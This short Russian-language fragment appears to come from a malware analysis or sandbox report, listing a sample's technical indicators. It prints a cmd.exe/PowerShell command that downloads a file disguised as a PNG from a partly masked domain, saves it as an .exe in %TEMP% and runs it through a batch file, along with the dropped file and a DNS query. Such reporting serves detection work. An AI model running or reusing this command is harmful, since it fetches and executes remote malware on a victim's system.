Техническая информация
- http://su###vesta.com/images/sraungban.png как %temp%\\ghu.exe
- '<SYSTEM32>\cmd.exe' "/k echo PowerShell (New-Object System.Net.WebClient).DownloadFile('http://su###vesta.com/images/sraungban.png','%TMP%\\ghu.exe');Start-Process '%TMP%\\ghu.exe'> %TMP%\\bnjf.bat & %TMP%\\bnjf.b...
- %TEMP%\bnjf.bat
- DNS ASK su###vesta.com